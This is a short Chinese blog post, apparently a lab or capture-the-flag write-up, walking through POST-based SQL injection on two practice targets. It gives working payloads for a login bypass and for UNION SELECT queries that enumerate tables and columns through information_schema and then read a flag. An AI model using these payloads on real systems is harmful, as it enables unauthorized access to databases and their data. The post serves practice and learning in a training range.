简单的POST sql注入

最新推荐文章于 2023-12-21 16:25:22 发布
最新推荐文章于 2023-12-21 16:25:22 发布
阅读量704 收藏 1
点赞数
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56757094/article/details/126584683
版权

靶场一

输入任意密码查看输出

发现输出有单引号
所以试试万能密码' or 1=1 -- qwe

可以成功

判断字段数

输入 order by 语句

有3个字段,第4个字段找不到

判断输入点

为2,3

查询表名

‘ or 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 — qwe

找到flag表

查询列名

‘ and password=’’ or 1=2 union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name=’flag’ limit 0,1 — qwe’

找到flag

查询flag

‘ and password=’’ union select 1,2,flag from flag limit 0,1 #

提交flag

提交成功

靶场二

我们需要用双引号和括号使之闭合,所以万能密码为 ") or 1=1 -- qwe

剩下的操作与作业一类似

直接放结果

沐雨赏心
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PostgreSql简介
qq_45903207的博客
08-28 9738
PostgreSQL简介
PostgreSQL 基础(一)-- 新手教程
chinusyan的专栏
05-29 1万+
PostgreSQL 基础(一)-- 教程
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4710
SQL注入原理-POST注入
Postgresql 基础使用语法
m0_65607651的博客
08-14 2452
Postgresql 基础使用语法
数据库--postgresql
weixin_43846708的博客
08-12 778
postgresql数据库数据库基础知识数据库数据表 数据库基础知识 数据库 数据库(Database, DB)是一个长期存储在计算机内的、有组织的、有共享的、统一管理的数据集合。 数据库是: 保管数据的“仓库” 数据管理的方法和计算 数据表 数据库系统的三个主要组成部分: 数据库 数据库管理系统 数据库应用程序 ......
sql注入 pikachu post数字型注入
08-12
sql注入 pikachu post数字型注入
SQL注入思路详解
12-14
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库...
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错的注入、基于floor的报错注入、基于boolean的盲注、基于时间的盲注……
php中$_GET与$_POST过滤sql注入的方法
01-21
本文实例讲述了php中$_GET与$_POST过滤sql注入的方法,分享给大家供大家参考。具体分析如下: 此函数只能过滤一些敏感的sql命令了,像id=1这种大家还是需要自己简单过滤了。 主要实现代码如下: 复制代码 代码如下:...
sql注入--POST注入
pakho_C的博客
01-04 4293
sql注入POST注入 靶场:sqli-labs-master 下载链接:靶场下载链接 POST和GET的区别 GET提交的数据会显示在URL中,POST则不会。这是最显而易见的差别。这点意味着GET更不安全(POST也不安全,因为HTTP是明文传输抓包就能获取数据内容,要想安全还得加密) GET回退浏览器无害,POST会再次提交请求(GET方法回退后浏览器再缓存中拿结果,POST每次都会创建新资源) GET提交的数据大小有限制(是因为浏览器对URL的长度有限制,GET本身没有限制),POST没有 GET
PostgreSql psql 用法
脑子进水养啥鱼?的博客
06-25 4065
psqlPostgreSQL 中的一个命令行交互式客户端工具,类似 Oracle 中的命令行工具 sqlplus,它允许用户交互地键入 SQL 语句或命令。此外,它还提供了一些快捷命令和多种类似 Shell 的特性来实现书写脚本,便于对大批量任务的自动化操作。虽然 psql 的功能与 sqlplus 差不多,但使用起来远比 sqlplus 简便,如可以用上下方向键,把上一条和下一条 SQL 命令翻出来,还有单击 Tab 键自动补全功能。
PostgreSql SQL 入门
脑子进水养啥鱼?的博客
06-15 3458
SQL(Structured Query Language)中文全称为”结构化查询语句“,在 1986 年成为 ANSI(American National Standards Institute 美国国家标准化组织)的一项标准,在 1987 年成为国际标准化组织(ISO)标准。SQL 是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。简单理解就是对我们数据库数据库中的表进行”增删改查“操作的编程语言。
SQL注入 - POST注入方法
HAKUNAMATATATTA的博客
08-30 640
SQL注入-POST注入方法教学
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2864
使用sqlmap进行post注入学习笔记
数据库PostgreSQL 和 MySQL对比
热门推荐
IT技术分享社区
05-20 1万+
比较版本:PostgreSQL 11 VS MySQL5.7(innodb引擎) Oracle官方社区版版权情况:PostgreSQL 11(免费开源)、MySQL5.7 Oracle官...
SQL注入【一些注入点总结】(六)
最新发布
12-21 817
SQL注入一些注入点总结:GET或POST注入、UA注入、Referer注入、Cookie注入、二次注入和DNSLOG外带。
SQL注入POST注入
weixin_43765321的博客
03-03 3611
1. POST请求介绍 1.1 POST消息头实例 1.2 POST请求介绍 POST方法起初是用来向服务器输入数据的 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交/文件上传等,请求会被包含在请求体中 POST方法可能会创建新的资源或修改现有资源 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 1.3 POST请求特点 POST请求不能被缓存下来 POST请求不会保存在浏览器
QT连接PostSql
qq_61847478的博客
10-05 2310
QT连接postsql 并取出数据库里面的数据
SQL注入-产生位置+post注入+sqlmap
xiaoheizi的博客
06-28 327
—url没有参数并不代表没有注入,有时会在数据包中,http数据包中每个部分只要可以被接收,都可能产生漏洞。还有一种方式,不用保存数据包,可以直接扫描,就是使用。信息进行对比,涉及到数据库查询操作。信息整理保存,用户访问后数据库会获取用户的。网站根据用户的访问设备给予显示页面。会写到数据库,如果能自定义。测试显错位,结果直接爆出了。,然后将数据包中的两个。参数传递位置:可以在。测试出字段数后,输入。抓取登录数据包,右键。
post请求SQL注入
03-10
Post请求SQL注入是一种常见的网络攻击方式,攻击者通过在Post请求中注入恶意SQL语句,从而获取或篡改数据库中的数据。为了防止这种攻击,开发者需要对用户输入的数据进行严格的过滤和验证,确保输入的数据符合预期的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值